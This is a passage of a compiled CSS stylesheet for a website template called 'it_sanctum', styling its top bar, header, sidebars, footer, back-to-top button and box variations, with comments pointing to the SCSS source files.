  -webkit-transition: margin 0.3s;
  -moz-transition: margin 0.3s;
  transition: margin 0.3s;
}
/* line 243, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-nav-overlay, .g-menu-overlay {
  -webkit-transition: opacity 0.3s ease-out 0s, z-index 0s;
  -moz-transition: opacity 0.3s ease-out 0s, z-index 0s;
  transition: opacity 0.3s ease-out 0s, z-index 0s;
}
/* line 1, templates/it_sanctum/scss/sanctum/_drawer.scss */
#g-drawer {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_drawer.scss */
#g-drawer h1, #g-drawer h2, #g-drawer h3, #g-drawer h4, #g-drawer h5, #g-drawer h6, #g-drawer strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_drawer.scss */
  #g-drawer {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top {
  background-color: #fff;
  border-bottom: 1px solid #f0f0f0;
  color: #959595;
  z-index: 1003;
  font-size: 0.81rem;
}
/* line 11, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top h1, #g-top h2, #g-top h3, #g-top h4, #g-top h5, #g-top h6, #g-top strong {
  color: #282828;
}
/* line 17, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 0;
  margin-bottom: 0;
}
/* line 24, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 25, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-block:last-child {
  text-align: right;
}
/* line 28, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-block:first-child {
  text-align: left;
}
/* line 33, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top > .g-container {
  position: relative;
}
/* line 38, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav {
  font-size: 0.81rem;
  font-family: "Lato";
}
/* line 41, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 42, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li {
  border-right: 1px solid #f0f0f0;
  margin: 0;
  margin-left: -4px;
}
/* line 46, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li:first-child {
  border-left: 1px solid #f0f0f0;
  margin-left: 0;
}
/* line 50, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li:last-child {
  margin-left: -4px;
}
/* line 52, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li:last-child .g-menu-item-container {
  padding: 9.125px 15px;
}
/* line 56, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container {
  padding: 9.125px 15px;
  line-height: inherit;
  color: #959595;
}
/* line 60, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container a {
  color: #959595;
}
/* line 62, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container a:hover {
  color: #4f953b;
}
/* line 66, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 67, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator:after {
  content: "\f107";
  opacity: 0.75;
  border: 1px solid #ddd;
  background: #f7f7f7;
  margin-left: 5px;
  border-radius: 4px;
  width: 1.5rem;
  text-align: center;
  line-height: 1;
}
/* line 80, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 81, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-toplevel > li:hover > .g-menu-item-container {
  color: #4f953b;
}
/* line 87, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-dropdown {
  background: #fff;
  border-radius: 0;
  box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
}
/* line 91, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-dropdown a {
  color: #959595;
  padding: 9px 15px;
}
/* line 95, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-dropdown li {
  border-bottom: 1px solid #ddd;
}
/* line 98, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-dropdown .g-dropdown-column {
  border-bottom: none;
}
/* line 103, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 104, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 105, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-sublevel > li > .g-menu-item-container {
  color: #959595;
  font-weight: normal;
}
/* line 110, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 111, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-sublevel > li:hover > .g-menu-item-container {
  background: #ddd;
  color: #626262;
}
/* line 117, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-sublevel > li:last-child {
  border-bottom: none;
}
/* line 121, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  top: 9px;
}
/* line 127, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 128, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-social a {
  width: 2.5rem;
  text-align: center;
}
@media only all and (max-width: 47.938rem) {
  #g-top .g-social a {
    width: 2rem;
  }
}
/* line 137, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-paypaldonate {
  margin: 0;
  text-align: right;
}
/* line 140, templates/it_sanctum/scss/sanctum/_top.scss */
/* line 141, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button {
  margin-bottom: -1px;
}
/* line 143, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button .g-paypaldonate-icon {
  padding: 0.75rem;
}
/* line 146, templates/it_sanctum/scss/sanctum/_top.scss */
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button input[type="submit"] {
  padding: 0 0.75rem;
}
/* line 153, templates/it_sanctum/scss/sanctum/_top.scss */
@media only all and (max-width: 47.938rem) {
  #g-top .size-50 {
    flex-basis: 50%;
  }
}
@media print {
  /* line 161, templates/it_sanctum/scss/sanctum/_top.scss */
  #g-top {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_header.scss */
#g-header {
  background-color: #fff;
  color: #959595;
  position: relative;
  z-index: 2;
  text-align: center;
}
/* line 14, templates/it_sanctum/scss/sanctum/_header.scss */
#g-header h1, #g-header h2, #g-header h3, #g-header h4, #g-header h5, #g-header h6, #g-header strong {
  color: #282828;
}
/* line 18, templates/it_sanctum/scss/sanctum/_header.scss */
#g-header .g-container {
  position: relative;
}
/* line 22, templates/it_sanctum/scss/sanctum/_header.scss */
#g-header .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 3rem;
  margin-bottom: 2.5rem;
}
@media print {
  /* line 31, templates/it_sanctum/scss/sanctum/_header.scss */
  #g-header {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_breadcrumb.scss */
#g-breadcrumb {
  padding: 1rem 0;
  background-color: #fff;
  background-image: url('../../images/bread.png');
  background-repeat: no-repeat;
  background-size: auto;
  background-attachment: scroll;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_breadcrumb.scss */
#g-breadcrumb h1, #g-breadcrumb h2, #g-breadcrumb h3, #g-breadcrumb h4, #g-breadcrumb h5, #g-breadcrumb h6, #g-breadcrumb strong {
  color: #282828;
}
@media only all and (max-width: 47.938rem) {
  #g-breadcrumb {
    text-align: center;
  }
}
@media print {
  /* line 20, templates/it_sanctum/scss/sanctum/_breadcrumb.scss */
  #g-breadcrumb {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
#g-fullwidth {
  padding: 0;
  background-color: #f7f7f7;
  color: #008056;
}
/* line 3, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
#g-fullwidth > .g-container {
  width: 100%;
  padding: 0;
  margin: 0;
}
/* line 8, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
#g-fullwidth .g-content {
  padding: 0;
  margin: 0;
}
/* line 20, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
#g-fullwidth h1, #g-fullwidth h2, #g-fullwidth h3, #g-fullwidth h4, #g-fullwidth h5, #g-fullwidth h6, #g-fullwidth strong {
  color: #282828;
}
@media print {
  /* line 26, templates/it_sanctum/scss/sanctum/_fullwidth.scss */
  #g-fullwidth {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_showcase.scss */
#g-showcase {
  padding: 3rem 0;
  background-color: #fff;
  color: #006142;
}
/* line 11, templates/it_sanctum/scss/sanctum/_showcase.scss */
#g-showcase h1, #g-showcase h2, #g-showcase h3, #g-showcase h4, #g-showcase h5, #g-showcase h6, #g-showcase strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_showcase.scss */
  #g-showcase {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_intro.scss */
#g-intro {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #2b2b2b;
}
/* line 11, templates/it_sanctum/scss/sanctum/_intro.scss */
#g-intro h1, #g-intro h2, #g-intro h3, #g-intro h4, #g-intro h5, #g-intro h6, #g-intro strong {
  color: #008056;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_intro.scss */
  #g-intro {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_feature.scss */
#g-feature {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_feature.scss */
#g-feature h1, #g-feature h2, #g-feature h3, #g-feature h4, #g-feature h5, #g-feature h6, #g-feature strong {
  color: #68ad53;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_feature.scss */
  #g-feature {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_subfeature.scss */
#g-subfeature {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_subfeature.scss */
#g-subfeature h1, #g-subfeature h2, #g-subfeature h3, #g-subfeature h4, #g-subfeature h5, #g-subfeature h6, #g-subfeature strong {
  color: #68ad53;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_subfeature.scss */
  #g-subfeature {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_utility.scss */
#g-utility {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_utility.scss */
#g-utility h1, #g-utility h2, #g-utility h3, #g-utility h4, #g-utility h5, #g-utility h6, #g-utility strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_utility.scss */
  #g-utility {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_maintop.scss */
#g-maintop {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_maintop.scss */
#g-maintop h1, #g-maintop h2, #g-maintop h3, #g-maintop h4, #g-maintop h5, #g-maintop h6, #g-maintop strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_maintop.scss */
  #g-maintop {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#g-system-messages {
  background-color: #fff;
  color: #959595;
}
/* line 10, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#g-system-messages h1, #g-system-messages h2, #g-system-messages h3, #g-system-messages h4, #g-system-messages h5, #g-system-messages h6, #g-system-messages strong {
  color: #282828;
}
@media print {
  /* line 16, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
  #g-system-messages {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 22, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
/* line 23, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message {
  padding: 0;
}
/* line 25, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message .alert {
  padding: 25px;
  margin: 4.563rem 1.563rem 0 1.563rem;
}
/* line 28, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message .alert .close {
  position: static;
}
/* line 30, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message .alert .close:hover {
  text-decoration: none;
}
/* line 34, templates/it_sanctum/scss/sanctum/_systemmessages.scss */
#system-message-container #system-message .alert p {
  margin: 15px 0 0 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar h1, #g-sidebar h2, #g-sidebar h3, #g-sidebar h4, #g-sidebar h5, #g-sidebar h6, #g-sidebar strong {
  color: #282828;
}
/* line 15, templates/it_sanctum/scss/sanctum/_sidebar.scss */
/* line 16, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
/* line 19, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
/* line 23, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
/* line 27, templates/it_sanctum/scss/sanctum/_sidebar.scss */
/* line 28, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0px;
  border: 1px solid #ddd;
}
/* line 32, templates/it_sanctum/scss/sanctum/_sidebar.scss */
#g-sidebar .g-features2-particle.style5 .g-features2-particle-title {
  font-size: 1.35rem;
}
@media print {
  /* line 40, templates/it_sanctum/scss/sanctum/_sidebar.scss */
  #g-sidebar {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_mainbody.scss */
#g-mainbody {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_mainbody.scss */
#g-mainbody h1, #g-mainbody h2, #g-mainbody h3, #g-mainbody h4, #g-mainbody h5, #g-mainbody h6, #g-mainbody strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_mainbody.scss */
  #g-mainbody {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside h1, #g-aside h2, #g-aside h3, #g-aside h4, #g-aside h5, #g-aside h6, #g-aside strong {
  color: #282828;
}
/* line 14, templates/it_sanctum/scss/sanctum/_aside.scss */
/* line 15, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
/* line 18, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
/* line 22, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
/* line 26, templates/it_sanctum/scss/sanctum/_aside.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0px;
  border: 1px solid #ddd;
}
/* line 31, templates/it_sanctum/scss/sanctum/_aside.scss */
#g-aside .g-features2-particle.style5 .g-features2-particle-title {
  font-size: 1.35rem;
}
@media print {
  /* line 39, templates/it_sanctum/scss/sanctum/_aside.scss */
  #g-aside {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_mainbottom.scss */
#g-mainbottom {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_mainbottom.scss */
#g-mainbottom h1, #g-mainbottom h2, #g-mainbottom h3, #g-mainbottom h4, #g-mainbottom h5, #g-mainbottom h6, #g-mainbottom strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_mainbottom.scss */
  #g-mainbottom {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_extension.scss */
#g-extension {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_extension.scss */
#g-extension h1, #g-extension h2, #g-extension h3, #g-extension h4, #g-extension h5, #g-extension h6, #g-extension strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_extension.scss */
  #g-extension {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_additional.scss */
#g-additional {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_additional.scss */
#g-additional h1, #g-additional h2, #g-additional h3, #g-additional h4, #g-additional h5, #g-additional h6, #g-additional strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_additional.scss */
  #g-additional {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_prebottom.scss */
#g-prebottom {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_prebottom.scss */
#g-prebottom h1, #g-prebottom h2, #g-prebottom h3, #g-prebottom h4, #g-prebottom h5, #g-prebottom h6, #g-prebottom strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_prebottom.scss */
  #g-prebottom {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_bottom.scss */
#g-bottom {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_bottom.scss */
#g-bottom h1, #g-bottom h2, #g-bottom h3, #g-bottom h4, #g-bottom h5, #g-bottom h6, #g-bottom strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_bottom.scss */
  #g-bottom {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_afterbottom.scss */
#g-afterbottom {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_afterbottom.scss */
#g-afterbottom h1, #g-afterbottom h2, #g-afterbottom h3, #g-afterbottom h4, #g-afterbottom h5, #g-afterbottom h6, #g-afterbottom strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_afterbottom.scss */
  #g-afterbottom {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_last.scss */
#g-last {
  padding: 3rem 0;
  background-color: #fff;
  background-image: url('../../images/doves.png');
  background-repeat: no-repeat;
  background-size: auto;
  background-attachment: scroll;
  background-position: right center;
  color: #959595;
}
/* line 12, templates/it_sanctum/scss/sanctum/_last.scss */
#g-last h1, #g-last h2, #g-last h3, #g-last h4, #g-last h5, #g-last h6, #g-last strong {
  color: #008056;
}
@media print {
  /* line 18, templates/it_sanctum/scss/sanctum/_last.scss */
  #g-last {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer {
  padding: 3rem 0;
  background-color: #282828;
  background-image: url('../../images/footer.jpg');
  background-repeat: no-repeat;
  background-size: cover;
  background-attachment: scroll;
  color: #6f6f6f;
}
/* line 11, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer h1, #g-footer h2, #g-footer h3, #g-footer h4, #g-footer h5, #g-footer h6, #g-footer strong {
  color: #fff;
}
/* line 14, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer a {
  color: #a2a2a2;
}
/* line 16, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer a:hover {
  color: #fff;
}
/* line 20, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 21, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-title:before, #g-footer .g-title:after {
  display: none;
}
/* line 26, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 34, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 35, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
/* line 38, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
/* line 46, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-features2-particle .g-features2-particle-icon {
  color: #fff;
  font-size: 90%;
}
/* line 52, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 53, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-social a {
  padding: 0.625rem;
  width: 3rem;
  height: 3rem;
  line-height: 1.5rem;
  color: #959595;
  margin: 0;
  border: none;
  background: rgba(0, 0, 0, 0.2);
  text-align: center;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 64, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-social a:first-child {
  border: none;
}
/* line 67, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-social a:hover {
  color: #4f953b;
  background: #fff;
}
@media print {
  /* line 76, templates/it_sanctum/scss/sanctum/_footer.scss */
  #g-footer {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright {
  padding: 10px 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright h1, #g-copyright h2, #g-copyright h3, #g-copyright h4, #g-copyright h5, #g-copyright h6, #g-copyright strong {
  color: #959595;
}
/* line 14, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright a {
  color: #4f953b;
}
/* line 16, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright a:hover {
  color: #c8c8c8;
}
/* line 20, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright .g-block {
  text-align: center;
}
@media only all and (max-width: 47.938rem) {
  #g-copyright {
    text-align: center;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright:before {
  left: 50%;
  margin-bottom: -50px;
  content: "";
  position: relative;
  display: block;
  width: 50px;
  height: 50px;
  -webkit-transform: translateX(-50%) rotate(45deg);
  transform: translateX(-50%) rotate(45deg);
  z-index: 10;
}
/* line 38, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright:before {
  top: -35px;
  background: #fff;
}
@media print {
  /* line 45, templates/it_sanctum/scss/sanctum/_copyright.scss */
  #g-copyright {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top {
  position: fixed;
  bottom: 0;
  left: 0;
  height: 0;
  width: 0;
}
/* line 7, templates/it_sanctum/scss/sanctum/_to-top.scss */
/* line 8, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style1 #g-totop-button {
  position: fixed;
  bottom: -40px;
  right: 28px;
  background: rgba(0, 0, 0, 0.4);
  color: #fff;
  border-radius: 3px;
  padding: 6px 13px;
  z-index: 999;
  outline: none;
  -webkit-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  -moz-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
}
/* line 19, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style1 #g-totop-button:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.938rem) {
  #g-to-top .style1 #g-totop-button {
    display: none;
  }
}
/* line 25, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style1 #g-totop-button.totopfixed {
  bottom: 28px;
}
/* line 30, templates/it_sanctum/scss/sanctum/_to-top.scss */
/* line 31, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style2 #g-totop-button {
  position: fixed;
  bottom: -40px;
  right: 28px;
  background: rgba(0, 0, 0, 0.4);
  color: #fff;
  border-radius: 50%;
  padding: 6px 13px;
  z-index: 999;
  outline: none;
  -webkit-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  -moz-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
}
/* line 42, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style2 #g-totop-button:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.938rem) {
  #g-to-top .style2 #g-totop-button {
    display: none;
  }
}
/* line 48, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style2 #g-totop-button.totopfixed {
  bottom: 28px;
}
/* line 1, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 4, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_variations.scss */
.flush .g-container > .g-grid > .g-block > .g-content {
  margin: 0;
  padding: 0;
}
/* line 14, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 15, templates/it_sanctum/scss/sanctum/_variations.scss */
.text-center .g-title, .title-center .g-title {
  text-align: center;
  margin-bottom: 40px;
}
/* line 18, templates/it_sanctum/scss/sanctum/_variations.scss */
.text-center .g-title:before, .title-center .g-title:before {
  content: "\f432";
  font-family: "Ionicons";
  font-size: 36px;
  color: #4f953b;
  margin: 0 auto;
  display: block;
}
@media only all and (max-width: 47.938rem) {
  .text-center .g-title:before, .title-center .g-title:before {
    display: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .text-center .g-title:before, .title-center .g-title:before {
    width: 80px;
  }
}
/* line 32, templates/it_sanctum/scss/sanctum/_variations.scss */
.text-center .g-title:after, .title-center .g-title:after {
  display: none;
}
/* line 36, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 37, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 38, templates/it_sanctum/scss/sanctum/_variations.scss */
.text-center .g-particle-intro .g-title:before, .title-center .g-particle-intro .g-title:before, .text-center .g-particle-intro .g-title:after, .title-center .g-particle-intro .g-title:after {
  display: none;
}
/* line 45, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 46, templates/it_sanctum/scss/sanctum/_variations.scss */
.title-border .g-title {
  border-bottom: 1px solid #ddd;
  padding-bottom: 10px;
}
/* line 47, templates/it_sanctum/scss/sanctum/_variations.scss */
.title-border .g-title:before, .title-border .g-title:after {
  display: none;
}
/* line 53, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 54, templates/it_sanctum/scss/sanctum/_variations.scss */
.title-border .g-particle-intro .g-title {
  border-bottom: none;
  padding-bottom: 0;
}
/* line 61, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 63, templates/it_sanctum/scss/sanctum/_variations.scss */
.title-clean .g-title:before, .title-clean .g-title:after {
  display: none;
}
/* line 69, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 70, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 71, templates/it_sanctum/scss/sanctum/_variations.scss */
[class*="box"].g-block > .g-content {
  margin: 1.5625rem;
}
/* line 77, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 78, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable, .box1.widget, .box1.g-outer-box, .box1 > .g-content {
  padding: 25px;
  border: 1px solid #ddd;
  background: #fff;
}
/* line 85, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable .g-title, .box1.widget .g-title, .box1.g-outer-box .g-title, .box1 > .g-content .g-title {
  border-bottom: 1px solid #ddd;
  padding-bottom: 15px;
}
/* line 86, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable .g-title:before, .box1.widget .g-title:before, .box1.g-outer-box .g-title:before, .box1 > .g-content .g-title:before, .box1.moduletable .g-title:after, .box1.widget .g-title:after, .box1.g-outer-box .g-title:after, .box1 > .g-content .g-title:after {
  display: none;
}
